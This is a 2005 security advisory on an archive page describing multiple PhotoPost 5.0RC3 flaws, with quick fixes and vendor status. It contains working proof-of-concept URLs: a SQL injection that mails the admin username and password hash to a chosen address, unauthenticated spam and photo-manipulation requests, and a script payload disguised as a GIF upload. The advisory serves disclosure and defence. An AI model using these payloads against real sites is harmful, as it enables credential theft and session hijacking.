what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

photopost50rc3.txt

photopost50rc3.txt
Posted Mar 15, 2005
Authored by Igor Franchuk

PhotoPost 5.0RC3 is susceptible to SQL injection, arbitrary file upload, cross site scripting, and various manipulation flaws.

tags | exploit, arbitrary, xss, sql injection, file upload
SHA-256 | 0b6ed983b076ee2d4747a046aec2414e2cdc85fe6b5b11e5af9bf5f2cb0512b8

photopost50rc3.txt

Change Mirror Download
  PhotoPost 5.0RC3, All Enthusiast, Inc, multiple vulnerabilities

March 05 2005

For your consideration.

1. BACKGROUND
PhotoPost is a popular commercial image publishing software.
Everyone loves showing off their photos! Add PhotoPost to your site, or let us install it for you,
and your visitors will be able to upload their photos to galleries on your site and interact in photo
discussions. Join the 3,500+ sites that are already using PhotoPost and add a fun new dimension to your website.
....
Yeah, it is just that bad.

2. IMPACT
A series of vulnerabilities allows a remote attacker
- to get arbitrary data from photopost tables (*)
- to spam administrator mailbox
- to steal sessions
- to manipulate photographs
- TO XSS PhotoPost
(*) under some configuration, I will describe it in details
later
- to upload "image" files with arbitrary content

3. SEVERITY
HIGH

4. ANALYSIS

4.1 GETTING ARBITRARY DATA FROM PHOTOPOST TABLES
PhotoPost (further on - PP) is built on a highly risky principle
of filtering input data, based on magic_quotes:
=------
magic_quotes_gpc boolean
Sets the magic_quotes state for GPC (Get/Post/Cookie) operations.
When magic_quotes are on, all ' (single-quote), " (double quote), \ (backslash) and NUL's are escaped with a backslash automatically.
=------
Turning magic_quotes on is neglected by a large percentage of PP users.
It is a good idea not to rely on user interaction in the essential matter of
data filtering and write nested procedures based on on the mysql_escape_string/mysql_real_escape_string
functions instead. Adding a few native strings of code would have definitely
fixed that "human" factor.
Many users do not have any idea what magic_quotes is and
what it is for and what their negligence will lead them to, even despite a
warning PP gives while installing. If one were to
look into architecture PP is assembled upon, it would become clear
that PP should even not attempt to install itself on systems with
magic_quotes turned off.

PROOF of CONCEPT
To see whether PP is running in the environment with magic quotes
turned off one might use the following URL:
http://photopost.hosting.site/photopost/member.php?ppaction=rpwd&verifykey=0&uid=0%20union%20select%20"0","yourmail@host.zone",%20concat(username,"%20",%20password)%20from%20users
no login required

* replace yourmail@host.zone for your email. If the magic
quotes turned off you'll get admin MD5 hash and user name on your mail.

* this URL might not work out if the site has an old mySQL version
=---
UNION is used to combine the result from many SELECT statements into one result set. UNION is available from MySQL 4.0.0 on
.....
=---
UNION is the only way to effectively exploit PHP based
queries, due to the security mysql_query provides. It was
clever of PHP developers not to allow multiple queries
divided by ';'

QUICK FIX
.htaccess
php_value magic_quotes_gpc 1


4.2 CODING NEGLIGENCE
Analysis of the query (I) leads only to another security
issue with PP. It has plenty unsafe requests like

"SELECT joindate,email,username FROM {$Globals['pp_db_prefix']}users WHERE userid=$uid"

Notice the fact database field userid is compared with
$uid. $uid is supplied by the user and thereby it's content
is arbitrary and still there is no quotes, no is_alpha,
intval check, nothing of the kind. Looking at the code in
random shows that, from time to time, PP is doing the
checking but the rule is not universal.

Even if the magic_quotes were turned on it might be possible
to devise a query that could pass, one way or another
through and get data posted on your mail anyway. But, the
example query (I) won't do it. It just constructed to pass through
several conditions that stands before 'send' is invoked.

QUICK FIX
1).htaccess
php_value magic_quotes_gpc 1
It will at least make it more difficult

4.3 SPAMING ADMINISTRATOR MAILBOX WITH ARBITRARY CONTENT
PP doesn't always check if the user is authorized. Though,
as in this particular case, three is a login attempt, it
won't interact with it's status.

The other problem is that PP absolutely doesn't care how
much events were served, say - mail sending, how often,
or how much authorization attempts were done, it is kind of
a lack of policy, combined it could lead to spam.

PROOF of CONCEPT
http://photopost.hosting.site/photopost/misc.php?action=reportpost&report=1&final=1
no login required

using this URL one may spam administrator email with
arbitrary number of letters and PP won't even try to stop it

QUICK FIX
adding
if ($User['userid'] == "") {
diewell( $Globals['pp_lang']['noreg'] );
}
after authenticate() is invoked. in the if($action =
"reportpost") section should fix the problem with
unauthorized users.

But it won't fix the problem in general, anyone who is
authorized will be able to spam administrator.


4.4 MANIPULATING USER PHOTOGRAPHS
The problem is related to adm-photo.php, despite all the rest
administrator scripts it doesn't require "adm-inc.php".
adm-inc.php has a built-in check that won't allow anybody
except administrator to pass further. That fact opens the
door to the set of administrator functions built into
adm-photo.php for everyone.

As an example I decided to construct URL that would
rebuild thumbnails for a picture with a given PID (in our case
it is 1), namely - it will rotate it clockwise.

ROOF of CONCEPT
http://photopost.hosting.site/photopost/adm-photo.php?ppaction=manipulate&pid=1&dowhat=rebuildthumb&dowhat=rotateccw
no login required

I'm not sure it is not one of the "features" but it looks like
no one but admin should be allowed to to this job.

QUICK FIX
I believe adding
require "adm-inc.php";
will solve the problem.


4.5 INSERTING ARBITRARY HTML CODE

XSS1

And finally, there is CSS in the PP.

function check_tags($data, $allowed){
$data = preg_replace("/<(.*?)>/e",
"process_tag(stripslashes('\\1'), \$allowed)",
$data);
$data = str_replace('javascript:','#',$data);
return $data;
}

I won't comment it. This is a very, very bad habit to check
javascript:

In short, it is possible to form data the way PP will upload
a given URL. Then it will "check" javascript using this lame
rule.

XSS2
PP doesn't check biography field 'editbio' in the user profile,
so, it can easily contain any arbitrary HTML code, tags,
javascript, when the personal information is viewed it
the session might be stolen.

QUICK FIX
None

4.6 UPLOADING IMAGES WITH ARBITRARY CONTENT

PP allows to upload any file disguised as an image. It
neither performs check of the file nor it tries to trim it
to some internal standard. Basically one uploads JS as an
image into PP then spreads a DIRECT link on the uploaded
image. IE will execute JS from a broken image transparently.

PROOF OF CONCEPT
injected.gif
<script>
document.write('<img src=http://www.microsoft.com/h/en-us/i/ts_1024_25_BillGWebcastB.jpg>');
alert('Injected');
</script>

PP SHOULD load 'as a picture; and then, in case of success,
save as a pictur' all the uploaded images to guarantee that
file content is at least image/gif.

QUICK FIX
None

5. VENDOR STATUS

Informed a week ago by mail. With no response.
Next time, if I have time to explore sources again, I'll not inform this
particular vendor. When this article was posted in the private PP forum
it was removed almost immediately.

Today I've got a letter (not personal) about a new 5.01 release. When
looking in the fixed files I saw that it really fixes some issues with PP,
that were described in this article. Especially the e-mail bypass
will not work in 5.01 under no condition.

I believe you may easily find the vulnerable versions, as well as
some of the source codes :-) with google.com


--
Best regards


















Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close